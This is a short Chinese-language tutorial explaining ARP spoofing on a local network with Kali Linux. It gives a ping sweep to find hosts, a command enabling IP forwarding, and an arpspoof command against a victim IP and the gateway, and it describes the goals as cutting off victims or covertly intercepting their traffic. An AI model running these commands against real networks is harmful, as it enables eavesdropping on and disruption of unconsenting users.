在同一局域网内用kail进行arp欺骗网络攻击
程序员文章站
2022-05-16 20:54:35
...
原理
就是同一局域网内,你用你的电脑去欺骗别的主机(包括手机或者电脑),骗他们你才是网关(就是一个局域网内连接互联网的大门),然后被你欺骗的主机就会把他们需要上网的数据包发给你,接着你就可以选择抛弃他们(这样那部受害机就上不了网了),或者你可以选择窃听数据然后帮它发送出去(这样就可以做到隐秘窃取数据#)。
我想了好久,我想到一个可以简单解释的一个说法
比如我有个朋友叫小明,我只知道他家的大概位置,然后你就到这个区域去一家家敲门问,“请问这是小明家吗,不是的话主人就不理我,是小明的话他就回复我说,这里是小明的家,我家的地址是在哪里哪里,而小明的家这个代号就是ip地址,他家的具体位置就是mac物理地址,在你一次次敲门问的这个过程就叫arp解析,通过一个代号来找到他家的具体位置就是arp解析
但是如果在我敲门问的时候有一家人很坏,他看我比较帅就骗我说这里是小明的家,然后就把我诱骗进去了,这个就是arp欺骗。
接下来是实验内容
第一步在Windows下获取所有连在同一局域网的所有主机
for /l %i in (1,1,255) do ping -n 1 -w 60 192.168.1.%i | find "回复
这个主要是用到了arp解析,让他一个个去询问这个ip在不在这个网络上,如果在那么就给你发送arp回馈,这样你的电脑arp缓存表就有这些主机了,紧接着你使用这个命令
arp -a
就可以获取所有的arp缓存表
第二步打开kail虚拟机,一定要使用桥接模式上网
打开终端输入:
echo 1 > /proc/sys/net/ipv4/ip_forward
这个命令是打开kail的报文转发,也就是我们刚刚原理打了#的那个第一个效果,如果1 被写入后面那个文件,那么kail就打开了报文转发,那么它就能够上网,如果是0的话那么受害机就无法上网
紧接着…紧张刺激的时刻就来啦~
在终端输入这个
arpspoof -I eth0 -t 192.168.1.57 192.168.1.1
注意自己要填写那个正确的ip,之后就开始了arp欺骗!